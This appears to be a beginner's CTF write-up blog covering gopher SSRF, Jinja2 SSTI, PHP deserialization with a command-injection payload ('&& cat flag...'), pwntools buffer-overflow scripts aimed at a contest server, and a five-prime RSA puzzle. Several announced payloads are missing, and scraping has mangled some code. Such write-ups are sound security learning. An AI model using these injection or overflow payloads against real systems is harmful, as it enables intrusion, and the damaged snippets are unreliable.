This CTF for beginners just popped up on SCINT, and I’m so busy currently so I didn’t participate the CTF seriously. But some problems are interesting and I still learned from them, down below are the write ups~
Write Up
Preview Card
A gopher SSRF!!! The main reason I want to have this writeup! The home page of it has only two links, one is the flag but only localhost can read it, and the other is a kink like this:
I tried it and found out a XSS, and I was like, “Well, is ther an admin bot?” The answer is NO! After many different tries, I gave it up and check out the hint:
1
What is SSRF, what is gopher
Ok, ok, I know what is SSRF, but WTH is gopher. Gopher is an protocal before http, which are commonly known for their extensive tunneling activities and their ability to destroy farms and gardens.(From wikipedia :D) The exploit for this challenge is to send a post request asking for localhost by gopher and see the sesults from debug on the page. link about gopher ssrf payload generator My first payload:
<form action="/flag.php" method="post"> Do you want the FLAG? <input type="text" name="givemeflag" value="no"> <input type="submit"> </form> FLAG:NCKUCTF{SSRF_Sneaky_Requests}
Jinja2
A SSTI (Server Side Template Injection), but since I’m not familiar with flask that much, so I googled the payload……. SSTI payloads The principle of SSTI is that the frame Jinja2 would describe a string with this pattern ({{.*}}) as a template element, and it could be Inject by connect some builtin magics to become RCE my payload:
I just wanted to chamge my payload cat_32337 into cat_322337'; ls echo 'a. But that didn’t work! After a few minutes, I realized that it was a php serialization string, and in this payload, s:9:”cat_32337” represent a string object, size of 9 and the value is “cat_32337”, so I also need to change my size value XD My payload:
O:3:"Cat":1:{s:4:"name";s:61:"cat_34347'&& cd ../../../ &&cat flag_5fb2acebf1d0c558&&echo'a";}
Rahh!!!!
Yet Another Username Password Checker
Challenge file This challenge allow two inputs, and it’s without stack canary and PIE, so it allows an ret2shellcode exploit. Method: First make the global variable become a shellcode get from exploit-db, and ret to the shellcode by BOF while inputing the second variable. My solve script:
p.s. I’m so cinfused that I consider ret2shellcode as a kind of BOF, but the flag and some other websites said that it’s a kind of ROP……
bof
Challenge file Just bof with ret2code~~~ My solve script:
1 2 3 4 5 6 7 8 9
rom pwn import * r=remote('140.116.246.190', 15553) for i inrange(4): s=r.recvuntil('\n') print(s) addr=0x4011b6 padding='a'*0x28 r.sendline(padding+p64(addr)) r.interactive()
puRely high School mAth
An RSA with five primes and a formula with five roots of the primes. solution:phi(n)/totient(n)=f(1)*-1 An easy but quite creative one. Challenge source:
from Crypto.Util.number import getPrime, bytes_to_long from numpy.polynomial import polynomial as P from secret import FLAG
primes = [] for i inrange(5): primes.append(getPrime(512))
pt = bytes_to_long(FLAG) N = primes[0] * primes[1] * primes[2] * primes[3] * primes[4] e = 0x10001 c = pow(pt, e, N) print(f"N = {N} \ne = {e} \nc = {c}")
coefficients = P.polyfromroots(primes) print(f"Although I am evil, I'll give you a hint") print( f"The polynomial is: ({coefficients[5]}) * x ** 5 + ({coefficients[4]}) * x ** 4 + ({coefficients[3]}) * x ** 3 + ({coefficients[2]}) * x ** 2 + ({coefficients[1]}) * x + {coefficients[0]}" ) print(f"There is no formula for solving polynomial of degree 5, haha! Good luck. - Yona")
for i in primes: assert ( test(i) == 0 ) # Sanity check: f(primes[0])=f(primes[1])=f(primes[2])=f(primes[3])=f(primes[4])=0
datas:
1 2 3 4 5 6
N = 74589377388479220256395124274755513621718001102938856092310626864216100145712997319914585852060516860124385965515331225191123640248815762375637061146158019710356354182927130436015567384589212130141604217421596634528636808019529188666442648153861134305235629996965542430142123282353328395170876196825775920311489204406316187516031426539335287082312293247953584850084586734086698849529182812144565314967419394593384813521249211428140352535373332471130679778470381067853395230164047935419526274875409265972962207414724607294335787238466834759816597980106867778766429397286635717142518810137545341313002078785183519807611849582375914565184651868791970435568273838266325138228060847909410186134993056874695784606042850167617165347780472076237226645613353060515144044347183509 e = 65537 c = 54372310422162708341909396227965961183075164626326017773456004764517207663829886720623601526357940251610660533163860948135456347826467002370324727678431322843031819718926459976753216927837967564953040402801257157084240349840883660989458820207012640721444852382837830533899879003788144950945681915970342254477344117298735514768937873088362985771838877041100278220389071111435319778351229795816490844209035434932113804441265743033999566002298838065894108562631005641425579848020654904227888485997533351392857727661036462725934031024681823937663271763906242364330796951143526976524873317993082339057106782776240418315046104198751660443814428478898635416762507143880424277125109381932855364490688177651782201815223200292490592250478205144562150126028403166082872900689137986 Although I am evil, I'll give you a hint The polynomial is: (1) * x ** 5 + (-48119449238959664064431388056848262083443351598010876486005413980899245102862943274432647312446266822103926556526300888806856941814195140033426532726966437) * x ** 4 + (916316390865283052868626470361843430815918523848362242777583162414894410696655556195550888998755174145739138567507614480869166751184302565410999041546991684138302351523261989111053193108570521027783948023551076049920890841240287983163459408048895095207456456247472660472441658241455701549473898214907795655566) * x ** 3 + (-8636441083905369069858042281233210939562373326826279452527134344325437120207426211765124178977354188033445775815868821763452710446707060837775101016795669592871763575334601044113835411901379743007595478612376693938561710975476581723590556220834011539105796136301231814195401206505414231054318174488622722611340281691158586557161782841515451050936630513236286511377050950331199002595328681947245303725234202732723544835902211707232831601361506113973845429026225606) * x ** 2 + (40312004179206688223872932025775480226076597343501861181532840272255094576634732415718100509136108879304510567702820703769197754909358459712403222683623066785661752598760763311650855902676830718134590209890586323292552227718091854684669628811126859486800060644183161968857476110122249234590895222131484100414587817486822592070046579831077159138144024860101119755482238856711941887533623456728755956754709985164455397940606771505768608528432853163841570748594353864364499997324136790864192493779011411411989999335219283264251298131077179324522557444743603629333420644593175780239045402537439673048420430564984413432945) * x + -74589377388479220256395124274755513621718001102938856092310626864216100145712997319914585852060516860124385965515331225191123640248815762375637061146158019710356354182927130436015567384589212130141604217421596634528636808019529188666442648153861134305235629996965542430142123282353328395170876196825775920311489204406316187516031426539335287082312293247953584850084586734086698849529182812144565314967419394593384813521249211428140352535373332471130679778470381067853395230164047935419526274875409265972962207414724607294335787238466834759816597980106867778766429397286635717142518810137545341313002078785183519807611849582375914565184651868791970435568273838266325138228060847909410186134993056874695784606042850167617165347780472076237226645613353060515144044347183509 There is no formula for solving polynomial of degree 5, haha! Good luck. - Yona
solve script:
1 2 3 4 5 6 7 8 9
from Crypto.Util.number import * deff(x): return((1) * x ** 5 + (-48119449238959664064431388056848262083443351598010876486005413980899245102862943274432647312446266822103926556526300888806856941814195140033426532726966437) * x ** 4 + (916316390865283052868626470361843430815918523848362242777583162414894410696655556195550888998755174145739138567507614480869166751184302565410999041546991684138302351523261989111053193108570521027783948023551076049920890841240287983163459408048895095207456456247472660472441658241455701549473898214907795655566) * x ** 3 + (-8636441083905369069858042281233210939562373326826279452527134344325437120207426211765124178977354188033445775815868821763452710446707060837775101016795669592871763575334601044113835411901379743007595478612376693938561710975476581723590556220834011539105796136301231814195401206505414231054318174488622722611340281691158586557161782841515451050936630513236286511377050950331199002595328681947245303725234202732723544835902211707232831601361506113973845429026225606) * x ** 2 + (40312004179206688223872932025775480226076597343501861181532840272255094576634732415718100509136108879304510567702820703769197754909358459712403222683623066785661752598760763311650855902676830718134590209890586323292552227718091854684669628811126859486800060644183161968857476110122249234590895222131484100414587817486822592070046579831077159138144024860101119755482238856711941887533623456728755956754709985164455397940606771505768608528432853163841570748594353864364499997324136790864192493779011411411989999335219283264251298131077179324522557444743603629333420644593175780239045402537439673048420430564984413432945) * x + -74589377388479220256395124274755513621718001102938856092310626864216100145712997319914585852060516860124385965515331225191123640248815762375637061146158019710356354182927130436015567384589212130141604217421596634528636808019529188666442648153861134305235629996965542430142123282353328395170876196825775920311489204406316187516031426539335287082312293247953584850084586734086698849529182812144565314967419394593384813521249211428140352535373332471130679778470381067853395230164047935419526274875409265972962207414724607294335787238466834759816597980106867778766429397286635717142518810137545341313002078785183519807611849582375914565184651868791970435568273838266325138228060847909410186134993056874695784606042850167617165347780472076237226645613353060515144044347183509) phi=-1*f(1) e=65537 c=54372310422162708341909396227965961183075164626326017773456004764517207663829886720623601526357940251610660533163860948135456347826467002370324727678431322843031819718926459976753216927837967564953040402801257157084240349840883660989458820207012640721444852382837830533899879003788144950945681915970342254477344117298735514768937873088362985771838877041100278220389071111435319778351229795816490844209035434932113804441265743033999566002298838065894108562631005641425579848020654904227888485997533351392857727661036462725934031024681823937663271763906242364330796951143526976524873317993082339057106782776240418315046104198751660443814428478898635416762507143880424277125109381932855364490688177651782201815223200292490592250478205144562150126028403166082872900689137986 n=74589377388479220256395124274755513621718001102938856092310626864216100145712997319914585852060516860124385965515331225191123640248815762375637061146158019710356354182927130436015567384589212130141604217421596634528636808019529188666442648153861134305235629996965542430142123282353328395170876196825775920311489204406316187516031426539335287082312293247953584850084586734086698849529182812144565314967419394593384813521249211428140352535373332471130679778470381067853395230164047935419526274875409265972962207414724607294335787238466834759816597980106867778766429397286635717142518810137545341313002078785183519807611849582375914565184651868791970435568273838266325138228060847909410186134993056874695784606042850167617165347780472076237226645613353060515144044347183509 d=inverse(e, phi) print(long_to_bytes(pow(c, d, n)))